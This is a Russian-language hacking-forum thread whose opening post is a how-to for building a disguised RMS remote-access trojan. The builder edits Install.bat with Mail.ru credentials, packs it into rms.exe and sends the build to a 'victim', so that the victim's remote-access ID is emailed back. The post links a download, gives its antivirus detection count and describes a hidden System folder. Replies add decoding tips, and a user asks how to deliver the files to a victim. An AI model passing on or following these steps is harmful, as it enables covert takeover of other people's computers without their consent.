Загрузка...

Resurrection RMS

Thread in Security created by Reska Feb 26, 2019. 1213 views

  1. Reska
    Reska Topic starter Feb 26, 2019 208 Jun 25, 2018
    Qq , всем форумчанам решившим прочитать эту тему. Сразу говорю , будет не мало букаф.Подобных статей на форуме нет видел.Поэтому если такова была .Воздерживайтесь от комментов по типу "БОЯН" и т.д.
    Думаю все знают что замечательная компания (помойка ещё та :trash::da:) TektonIT в августе 2018 года послала всех билдеров RMS нахер, т.к. убрала возможность отправлять InternetID на почту. Все конечно огорчились , но шарющие люди сделали отправку на FTP-сервер и не парились больше по этому поводу :podumai:. Но шо же делать обычным людям , не шарющим в этой теме? Сегодня я отвечу на этот вопрос (выглядит как рекламный слоган :roflanebalo:)
    RMS Build
    Инструкция по созданию

    1
    Когда мы открываем архив , то видим 2 файла


    [IMG]
    Открываем Install.bat с помощью блокнота или любого другого редактора
    Каждую строку я закомментировал


    [IMG]
    Там где написана почта получателя пишем любую почту , а где написано почта отправителя нужно писать только почту Mail.ru ДРУГИЕ НЕ БУДУТ РАБОТАТЬ
    Дальше там строки логин отправителя , пароль отправителя , вставляем пароль и логин от почты.

    Советую создать фейк почту
    Сохраняем (Ctrl+S)
    2

    Открываем файл rms.exe с помощью архиватора и перекидываем в него файл install.bat

    [IMG]
    Всё , наш билд готов . можно скидывать его жертве и Вам на почту придет его ID. На почту придет ID в текстовике. Там нужно взять Hex и декодировать его (Преобразовать в текст). Копируете Hex, потом удаляете все символы (/ , ) и идете например сюда http://crypt-online.ru/crypts/text2hex/
    Удалить символы в hex можно через блокнот: вставляете сам hex, выделяете, жмете заменить и заменяйте слэш, запятую и пробелы на пустоту. После расшифровки ID будет находиться тут <internet_id></internet_id>

    Download


    -VT-
    45/68
    Этот вирус создаёт папку System по пути C:\Program Files (x86)\System при создании эта папка не будет скрытой , примерно через 10 сек она становиться скрытой и системной папкой что бы увидеть её нужно убрать галочку отсюда [IMG]
    Сообщение на почту может идти до 5 мин. Если не пришло , значит Вы что-то сделали нет так.
    Надеюсь что Вам понравилась эта тема, и Вы поставите мне симпу))
    P.S. Не судите строго,тема может быть немного кривой, делаю подобную первый раз.
     
  2. dontreg
    dontreg Feb 26, 2019 Мда 3759 Feb 19, 2019
    +реп за старания, но темы уже были, если не ошибаюсь
     
  3. Reska
    Reska Topic starter Feb 26, 2019 208 Jun 25, 2018
    dontreg, Мог быть подобный билд тому, что я скинул , но не он) А вообще как я и говорил, такой темы я не нашёл .
     
  4. dontreg
    dontreg Feb 26, 2019 Мда 3759 Feb 19, 2019
    P.S: На почту придет ID в текстовике. Там нужно взять Hex и декодировать его (Преобразовать в текст). Крч, копируете Hex, потом удаляете все символы (/ , ) и идете например сюда http://crypt-online.ru/crypts/text2hex/
    Удалить символы в hex можно через блокнот: вставляете сам hex, выделяете, жмете заменить и заменяте слэш, запятую и пробелы на пустоту. И у вас должны остаться лишь цифры с буквами. (Кто не понял - в ЛС можете)
     
  5. Reska
    Reska Topic starter Feb 26, 2019 208 Jun 25, 2018
    dontreg, Значит была такая тема.
     
  6. ANDREUN0
    ANDREUN0 Feb 26, 2019 77 Nov 19, 2018
    еба у тебя хайд, это же в паблике есть!
     
  7. dontreg
    dontreg Feb 26, 2019 Мда 3759 Feb 19, 2019
    На том же ютабе есть:roflanebalo:
     
  8. Reska
    Reska Topic starter Feb 26, 2019 208 Jun 25, 2018
    dontreg, та я знаю. Просто так сказать всё это в текстовом формате сделал.
     
  9. ANDREUN0
    ANDREUN0 Feb 26, 2019 77 Nov 19, 2018
    Ну зач такой хайд поставил тогда?)
     
  10. ANDREUN0
    ANDREUN0 Feb 26, 2019 77 Nov 19, 2018
    а уже снизил, прошу прощения :roflanZdarova:
     
  11. 4uvakok
    4uvakok Feb 26, 2019 Banned 920 Jan 13, 2017
    Щас бы на вирустотал рмс сливать .. Чтобы ещё больше палили
     
  12. Reska
    Reska Topic starter Feb 26, 2019 208 Jun 25, 2018
    4uvakok, Мб кому-то интересно кол-во детектов
     
  13. 4uvakok
    4uvakok Feb 26, 2019 Banned 920 Jan 13, 2017
    Для этого есть no distribute
     
  14. NVTVS
    NVTVS Feb 26, 2019 Banned 389 Dec 26, 2018
    Зачем нужен РМС , если есть уже ботнет слитый:thinking:
     
  15. 4uvakok
    4uvakok Feb 26, 2019 Banned 920 Jan 13, 2017
    Зачем получать 25$ на блокчейн если можно получить 11$)
     
  16. NVTVS
    NVTVS Feb 26, 2019 Banned 389 Dec 26, 2018
    Забавно)
     
  17. al1ex1nadra8
    Объясните что такое логин отправителя? Я просто смотрела, только имя, ничего не поняла.
     
  18. dontreg
    dontreg Apr 1, 2019 Мда 3759 Feb 19, 2019
    Емэйл почты, с которой будет отправлять айди на вторую почту
     
  19. al1ex1nadra8
    Еще вопрос. Я тут сделала все как нужно, но как кидать файл? Я закинула install.bat и как его кидать? Просто кидать сам ЕХЕ или еще что - то? Я про жертву, типа какие ей файлы кидать.
     
  20. al1ex1nadra8
    И что делать с rms.host?
     
Top
Loading...